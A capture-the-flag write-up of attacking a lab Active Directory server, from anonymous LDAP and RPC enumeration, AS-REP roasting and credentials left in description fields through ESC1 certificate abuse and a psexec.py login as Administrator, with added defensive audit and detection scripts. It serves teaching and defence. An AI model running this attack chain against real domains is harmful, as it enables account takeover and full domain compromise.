Difficulty: Hard
Type: Active Directory
Port Scan #
Cleaned port scan
Nmap scan report for 10.66.151.236
Host is up, received syn-ack ttl 126 (0.060s latency).
# Authentication & Directory Services
88/tcp kerberos-sec Microsoft Windows Kerberos
389/tcp ldap Microsoft Windows Active Directory
464/tcp kpasswd5? Kerberos password change?
636/tcp ssl/ldap Secure LDAP
3268/tcp ldap Global Catalog LDAP
3269/tcp ssl/ldap Global Catalog LDAP over SSL
# Web Services
80/tcp http Microsoft IIS httpd 10.0
443/tcp ssl/https? Possibly HTTPS
47001/tcp http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# Remote Access
3389/tcp ms-wbt-server Microsoft Terminal Services (RDP)
# Microsoft RPC / DCOM
135/tcp msrpc Microsoft Windows RPC
593/tcp ncacn_http Microsoft Windows RPC over HTTP
9389/tcp mc-nmf .NET Message Framing
49664/tcp msrpc Microsoft Windows RPC
49665/tcp msrpc Microsoft Windows RPC
49666/tcp msrpc Microsoft Windows RPC
49668/tcp msrpc Microsoft Windows RPC
49669/tcp ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp msrpc Microsoft Windows RPC
49671/tcp msrpc Microsoft Windows RPC
49675/tcp msrpc Microsoft Windows RPC
49676/tcp msrpc Microsoft Windows RPC
49681/tcp msrpc Microsoft Windows RPC
49702/tcp msrpc Microsoft Windows RPC
49712/tcp msrpc Microsoft Windows RPC
49718/tcp msrpc Microsoft Windows RPC
49722/tcp msrpc Microsoft Windows RPC
# File Sharing / Network Services
139/tcp netbios-ssn Microsoft Windows NetBIOS
445/tcp microsoft-ds? SMB over TCP
# DNS Services
53/tcp domain Simple DNS Plus
Add to our /etc/hosts
10.66.151.236 thm.local labyrinth.thm.local
Jumping right in #
From the port scan, the first thing that jumps out is that we have web servers on ports 80 and 443, as well as on 47001.
A quick Google search shows port 47001 is commonly associated with WinRM; odd to see a web server there.

We can't access it over HTTP, at least from our browser.

We see a default IIS web server on port 80.

I ran a directory brute force and found nothing notable, which was expected. I also tested against HTTPS.
┌──(parallels㉿Kali)-[~/targets/ledger]
└─$ gobuster dir -u http://10.66.151.236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,json,xml -b 404 -k -o dirs.txt -t 50
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.66.151.236/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: xml,php,html,json
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ (Status: 400) [Size: 3490]
*checkout* (Status: 400) [Size: 3490]
*docroot* (Status: 400) [Size: 3490]
* (Status: 400) [Size: 3490]
devinmoore* (Status: 400) [Size: 3490]
200109* (Status: 400) [Size: 3490]
*sa_ (Status: 400) [Size: 3490]
*dc_ (Status: 400) [Size: 3490]
Progress: 1102790 / 1102790 (100.00%)
===============================================================
Finished
===============================================================
Enumeration #
We run enum4linux-ng for unauthenticated/anonymous enumeration:
enum4linux-ng -A labyrinth.thm.local -oA results.txt
The main thing we look for in an unauthenticated scan is any sort of anonymous access, and we find that we can authenticate anonymously to RPC.
================================================
| RPC Session Check on labyrinth.thm.local |
================================================
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
With this information I decided to try to connect to SMB first.
SMB #

I could list shares and access the NETLOGON and SYSVOL shares, but had no list permissions, so I moved on for now.
RPC #
Next, I tried connecting to RPC anonymously, which worked, but I couldn't run any useful commands except for querying the domain SID.

Even though it appears we can't run any useful commands manually, we continue to enumerate with Impacket's rpcdump.py tool.
Running rpcdump.py anonymously was successful: we listed 420 endpoints.

With RPC access available, we can enumerate domain users by RID brute-forcing with lookupsid.py, which resolves valid accounts by incrementing the RID appended to the domain SID.

Now we clean up our user list and check our options: AS-REP roasting, password spraying, etc.
Using the user list, we validate active accounts via Kerberos enumeration with kerbrute, which identifies valid users and detects accounts with pre-authentication disabled; for those it returns an AS-REP hash that can be cracked offline.
kerbrute_linux_arm64 userenum users.txt -d thm.local --dc 10.66.151.236 > valid-users.txt
.......
2026/01/20 13:52:48 > Done! Tested 493 usernames (490 valid) in 7.040 seconds
From running kerbrute we also see various user accounts that have no pre-auth required, so their hashes get dumped for us. Now we can save these hashes and crack them using hashcat.

Cracking these hashes with rockyou.txt didn't work.

Since rockyou.txt didn't work, I thought the goal could be to get the domain's password policy so we can create our own targeted wordlist with some hashcat rules for a better hit rate, but decided to stop here for now.
LDAP #
Took a break; the VM IP is now 10.64.146.175.
Leaving AS-REP roasting as a dead end, I checked what we could dump from LDAP anonymously.

We dump 17 thousand lines worth of LDAP data... unauthenticated...
After manual review we see the description field consistently set to something describing the user's level of access ("tier 1 user"), so we grep for description to check for any differences:
cat ldap.txt | grep description
To my surprise, it looks like an admin left default creds in the description fields of a couple of users.

Let's see who they belong to.
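The two findings above (accounts that kerbrute flagged as not requiring pre-authentication, and credentials left in description attributes) are both things a defender can audit straight from an LDAP dump. The following is an added example, not part of the original write-up or any of the tools it uses: it parses a small LDIF-style dump, decodes the userAccountControl bits to list accounts with DONT_REQ_PREAUTH set (the AS-REP roastable ones), and flags descriptions that look like they carry a password. The sample dump, account values and passwords are constructed; the attribute names and flag values are the real AD ones.

```python
import base64
import re

# Constructed sample of an ldapsearch/LDIF-style dump. Account names echo the write-up,
# but the userAccountControl values, descriptions and password are made up.
SAMPLE_LDIF = """\
dn: CN=Susanna McKnight,OU=Users,DC=thm,DC=local
sAMAccountName: susanna_mcknight
userAccountControl: 66048
description: Tier 1 user

dn: CN=Ivy Willis,OU=Users,DC=thm,DC=local
sAMAccountName: ivy_willis
userAccountControl: 4260352
description: Tier 1 user - default password: Welcome2024! (change on first login)

dn: CN=Svc Backup,OU=Service,DC=thm,DC=local
sAMAccountName: svc_backup
userAccountControl: 4260354
description: Backup service account, pwd=B@ckup123
"""

# userAccountControl bits (values from the AD schema documentation).
UAC_ACCOUNTDISABLE = 0x00000002
UAC_DONT_REQ_PREAUTH = 0x00400000   # 4194304: Kerberos pre-authentication not required

# Loose pattern for "password-ish" text in free-form attributes; tune to taste.
CRED_PATTERN = re.compile(r"\b(pass(word|wd)?|pwd|creds?)\b\s*[:=]?\s*\S+", re.IGNORECASE)


def parse_ldif(text):
    """Parse a minimal LDIF dump into a list of dicts, one per entry.
    Every attribute maps to a list of values; 'attr:: <base64>' values are decoded."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        value = value.strip()
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(key.strip(), []).append(value)
    if current:
        entries.append(current)
    return entries


def accounts_without_preauth(entries):
    """sAMAccountNames with DONT_REQ_PREAUTH set on an enabled account."""
    found = []
    for e in entries:
        uac = int(e.get("userAccountControl", ["0"])[0])
        if uac & UAC_DONT_REQ_PREAUTH and not uac & UAC_ACCOUNTDISABLE:
            found.append(e.get("sAMAccountName", ["?"])[0])
    return found


def descriptions_with_credentials(entries):
    """(sAMAccountName, description) pairs whose description looks like it holds a password."""
    hits = []
    for e in entries:
        for desc in e.get("description", []):
            if CRED_PATTERN.search(desc):
                hits.append((e.get("sAMAccountName", ["?"])[0], desc))
    return hits


def audit(text):
    """Run both checks over an LDIF dump and return the findings."""
    entries = parse_ldif(text)
    return {
        "no_preauth": accounts_without_preauth(entries),
        "cred_in_description": descriptions_with_credentials(entries),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_LDIF)
    print("Accounts not requiring Kerberos pre-auth:", report["no_preauth"])
    for name, desc in report["cred_in_description"]:
        print(f"Credential-like description on {name}: {desc}")
```

Run it against a real dump by replacing SAMPLE_LDIF with the file contents (the description attribute is readable by every authenticated user by default, which is exactly why it must never hold a password). The disabled svc_backup account is deliberately excluded from the pre-auth list but still reported for its description, since a disabled account is often re-enabled later with the same attributes.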

Initial Access #
Now we have one possible password for two different users, Susanna_mcknight and ivy_willis.
Unfortunately my TryHackMe machine lost its connection; new IP 10.65.176.175.

Confirmed successful SMB authentication for the susanna and ivy accounts; the password is not expired.
Since we have RDP open, we try with ivy, which fails, then with susanna, which succeeds. We now have user.txt and a foothold.

Privilege escalation #
Bloodhound

Didn't find much, but good to have for later. Never ended up using it.
Enumerating installed programs and running services → nothing really interesting other than Certificate Services:
PS C:\Users\SUSANNA_MCKNIGHT\Downloads> Get-Service | Where-Object {$_.StartType -eq "Auto" -and $_.Status -eq "Running"}
Status Name DisplayName
------ ---- -----------
Running ADWS Active Directory Web Services
Running AmazonSSMAgent Amazon SSM Agent
Running AppHostSvc Application Host Helper Service
Running BFE Base Filtering Engine
Running BrokerInfrastru... Background Tasks Infrastructure Ser...
Running CDPSvc Connected Devices Platform Service
Running CDPUserSvc_152ed2 Connected Devices Platform User Ser...
Running CertSvc Active Directory Certificate Services
Running CoreMessagingRe... CoreMessaging
Running CryptSvc Cryptographic Services
Running DcomLaunch DCOM Server Process Launcher
Running Dfs DFS Namespace
Running DFSR DFS Replication
Running Dhcp DHCP Client
Running DNS DNS Server
Running Dnscache DNS Client
Running DPS Diagnostic Policy Service
Running EventLog Windows Event Log
Running EventSystem COM+ Event System
Running FontCache Windows Font Cache Service
Running gpsvc Group Policy Client
Running IKEEXT IKE and AuthIP IPsec Keying Modules
Running iphlpsvc IP Helper
Running IsmServ Intersite Messaging
Running Kdc Kerberos Key Distribution Center
Running LanmanServer Server
Running LanmanWorkstation Workstation
Running LSM Local Session Manager
Running mpssvc Windows Defender Firewall
Running MSDTC Distributed Transaction Coordinator
Running Netlogon Netlogon
Running NlaSvc Network Location Awareness
Running nsi Network Store Interface Service
Running Power Power
Running ProfSvc User Profile Service
Running RpcEptMapper RPC Endpoint Mapper
Running RpcSs Remote Procedure Call (RPC)
Running SamSs Security Accounts Manager
Running Schedule Task Scheduler
Running SENS System Event Notification Service
Running ShellHWDetection Shell Hardware Detection
Running Spooler Print Spooler
Running SysMain SysMain
Running SystemEventsBroker System Events Broker
Running Themes Themes
Running UALSVC User Access Logging Service
Running UserManager User Manager
Running UsoSvc Update Orchestrator Service
Running W32Time Windows Time
Running W3SVC World Wide Web Publishing Service
Running Wcmsvc Windows Connection Manager
Running WinDefend Windows Defender Antivirus Service
Running Winmgmt Windows Management Instrumentation
Running WinRM Windows Remote Management (WS-Manag...
Running WpnService Windows Push Notifications System S...
Running WpnUserService_... Windows Push Notifications User Ser...
PS C:\Users\SUSANNA_MCKNIGHT\Downloads>
whoami /all enumeration
PS C:\Users\SUSANNA_MCKNIGHT\Downloads> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
thm\susanna_mcknight S-1-5-21-1966530601-3185510712-10604624-1475
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\Users\SUSANNA_MCKNIGHT\Downloads>
We see the group Certificate Service DCOM Access, so let's try to grab certificate templates as this user.
After dumping the templates we see template #34 is named vuln and allows any authenticated user to enroll in the certificate. We're definitely on the right path here.

After doing a bit of research on AD CS vulnerabilities, I came across the tool certipy-ad, which we can use to scan all of our found templates for vulnerabilities.

Now we can sift through the output.

We find that the template ServerAuth is vulnerable to an ESC1 misconfiguration!
ESC1 can be described as follows:
“ESC1 is the stereotypical AD CS misconfiguration that can lead directly to privilege escalation. The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity within the certificate’s SAN. This allows the attacker to impersonate any user, including administrators.”
https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation
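The quoted definition boils down to a checklist of template attributes, which is the same checklist an AD CS administrator can run over their own templates before a scanner does. The following is an added example (not code from the write-up or from Certipy): it evaluates each template against the ESC1 conditions using the real attribute names and flag values from the AD certificate template schema. The template records are constructed; the enroll_principals and enabled fields are simplifications standing in for the template's security descriptor and for whether a CA publishes it.

```python
from typing import Dict, List

# EKU OIDs that let a certificate authenticate a principal; an empty EKU list means Any Purpose.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # bit in msPKI-Enrollment-Flag: manager approval
LOW_PRIV_GROUPS = {"domain users", "domain computers", "authenticated users", "everyone", "users"}

# Constructed sample templates (attribute names are real, values are made up for the demo).
SAMPLE_TEMPLATES = [
    {"name": "ServerAuth", "enabled": True,
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],   # Server + Client Auth
     "enroll_principals": ["THM\\Domain Users"]},
    {"name": "WebServer", "enabled": True,
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],                        # Server Auth only
     "enroll_principals": ["THM\\Domain Users"]},
    {"name": "User", "enabled": True,
     # SUBJECT_ALT_REQUIRE_UPN | SUBJECT_REQUIRE_DIRECTORY_PATH: the CA builds the subject from AD
     "msPKI-Certificate-Name-Flag": 0x82000000, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_principals": ["THM\\Domain Users"]},
    {"name": "ApprovedAdmin", "enabled": True,
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_principals": ["THM\\Domain Users"]},
    {"name": "CountersignedAnyPurpose", "enabled": True,
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 1,
     "pKIExtendedKeyUsage": [],                                           # empty = Any Purpose
     "enroll_principals": ["THM\\Authenticated Users"]},
]


def esc1_failures(t: Dict) -> List[str]:
    """Return the ESC1 conditions this template does NOT meet. An empty list means
    every condition holds and the template is ESC1-exposed."""
    failed = []
    if not t.get("enabled", False):
        failed.append("not published on any CA")
    enrollers = {p.split("\\")[-1].lower() for p in t.get("enroll_principals", [])}
    if not enrollers & LOW_PRIV_GROUPS:
        failed.append("no low-privileged principal holds Enroll")
    if t.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        failed.append("manager approval required")
    if t.get("msPKI-RA-Signature", 0) > 0:
        failed.append("authorized signatures required")
    if not t.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        failed.append("enrollee cannot supply the subject/SAN")
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    if ekus and not ekus & AUTH_EKUS:
        failed.append("no authentication EKU")
    return failed


def esc1_templates(templates: List[Dict]) -> List[str]:
    """Names of the templates on which every ESC1 condition holds."""
    return [t["name"] for t in templates if not esc1_failures(t)]


if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        failures = esc1_failures(t)
        print(f"{t['name']}: {'ESC1' if not failures else 'ok (' + '; '.join(failures) + ')'}")
```

Each failed condition is also a remediation: clearing ENROLLEE_SUPPLIES_SUBJECT, turning on manager approval, requiring a signature, or removing Enroll from broad groups each breaks the chain on its own. Fixing the subject flag is the cleanest, since it is the one that lets the requester name an arbitrary identity.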
Knowing this, let's impersonate the administrator user.
First, let's request a certificate as the administrator.

Now let's use that certificate to request a TGT so we can log in.

We run this export command so psexec knows where to find our .ccache file:
export KRB5CCNAME=~/targets/ledger/administrator.ccache
We then used psexec to authenticate over SMB and create a temporary service on the target system, resulting in an interactive shell running as the Administrator user.
psexec.py -dc-ip 10.65.176.175 -target-ip 10.65.176.175 -no-pass -k thm.local/administrator@LABYRINTH.thm.local
Now we can get our root flag.
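The temporary service psexec creates is also the most reliable place to catch this final step: Windows logs every new service in the System log as event 7045 ("A service was installed in the system"), and Impacket's psexec.py by default uploads its service binary to the ADMIN$ share, which is the Windows directory. The following is an added example, not part of the write-up: it scans a list of exported System-log events for 7045 records whose service binary sits directly in the Windows directory, or whose service name is a well-known remote-execution service. The events, service names and binary names below are constructed, and the allowlist is a hypothetical placeholder to be tuned per environment.

```python
import ntpath
import re

# Constructed System-log events as a SIEM export might present them (not logs from the target).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Amazon SSM Agent", "AccountName": "LocalSystem",
     "ImagePath": '"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe"', "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "XyQw", "AccountName": "LocalSystem",
     "ImagePath": "%SystemRoot%\\KJaTpQwM.exe", "StartType": "demand start"},
    {"EventID": 7036, "ServiceName": "XyQw", "AccountName": "", "ImagePath": "", "StartType": ""},
    {"EventID": 7045, "ServiceName": "NetSvcHelper", "AccountName": "LocalSystem",
     "ImagePath": "C:\\Windows\\System32\\svchost.exe -k netsvcs", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "PSEXESVC", "AccountName": "LocalSystem",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "StartType": "demand start"},
]

# Ways the Windows directory shows up in an ImagePath (compared lower-cased, no trailing slash).
SYSTEM_ROOT_DIRS = {"%systemroot%", "c:\\windows", "\\systemroot", "\\\\?\\c:\\windows"}
# Service name used by Sysinternals PsExec; a matching 7045 is worth a look on any host.
KNOWN_REMOTE_EXEC_SERVICES = {"psexesvc"}
# Hypothetical allowlist of binaries legitimately installed straight into the Windows directory.
SYSTEM_ROOT_ALLOWLIST = {"explorer.exe"}


def binary_of(image_path: str):
    """Strip quotes and command-line arguments from an ImagePath and return (directory, filename)."""
    path = image_path.strip()
    if path.startswith('"'):
        path = path[1:].split('"', 1)[0]
    else:
        path = re.split(r"\s+[-/]", path, maxsplit=1)[0]
    directory, name = ntpath.split(path.lower())
    return directory.rstrip("\\"), name


def suspicious_service_installs(events):
    """Return (service name, reason) for 7045 events that match the psexec-style pattern."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 7045:
            continue
        svc = ev["ServiceName"]
        directory, name = binary_of(ev["ImagePath"])
        if svc.lower() in KNOWN_REMOTE_EXEC_SERVICES:
            hits.append((svc, "known remote-execution service name"))
        elif directory in SYSTEM_ROOT_DIRS and name.endswith(".exe") and name not in SYSTEM_ROOT_ALLOWLIST:
            hits.append((svc, f"service binary dropped directly in the Windows directory: {name}"))
    return hits


if __name__ == "__main__":
    for svc, reason in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"[!] {svc}: {reason}")
```

Pair this with the 4624 logon (type 3, Kerberos) that precedes the service install and with SMB writes to ADMIN$ (5145 if object access auditing is on) to get the full sequence, and note that a certificate-derived ticket still shows as an ordinary Kerberos logon for the impersonated account, so the service install is often the first loud signal.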
